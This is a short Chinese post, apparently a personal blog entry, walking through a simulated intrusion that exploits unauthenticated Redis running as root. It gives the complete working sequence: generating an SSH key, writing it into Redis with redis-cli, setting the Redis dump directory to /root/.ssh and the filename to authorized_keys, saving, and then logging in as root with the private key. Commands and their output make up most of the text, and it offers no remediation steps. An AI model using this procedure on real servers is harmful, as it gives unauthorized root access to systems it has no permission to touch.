利用redis安装漏洞入侵系统的一次渗透模拟

原因 默认 redis 安装存在漏洞,用root启动redis 可以直接 获取 root 权限,而如果服务器又是用root 直接远程登录的 那就受伤了 哥曾经差点受伤
ssh-keygen -t rsa
然后将公钥写入foo.txt文件
cd .ssh ;
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

再连接Redis写入文件
cat foo.txt | redis-cli -h 192.168.1.10 -x set crackit
redis-cli -h 192.168.1.10

192.168.1.10:6379> config set dir /root/.ssh/
OK
$ 192.168.1.10:6379> config get dir
1) “dir”
2) “/root/.ssh”
$ 192.168.1.10:6379> config set dbfilename "authorized_keys"
OK
$ 192.168.1.10:6379> save
OK
这样就可以成功的将自己的公钥写入/root/.ssh文件夹的authotrized_keys文件里,然后攻击者直接执行:
即可远程利用自己的私钥登录该服务器。
ssh -i id_rsa root@192.168.1.10
当然,写入的目录不限于/root/.ssh 下的authorized_keys,也可以写入用户目录,不过Redis很多以root权限运行,所以写入root目录下,可以跳过猜用户的步骤。
默认 redis 安装存在漏洞, 可以直接 获取 root 权限
Redis 未授权访问缺陷可轻易导致系统被黑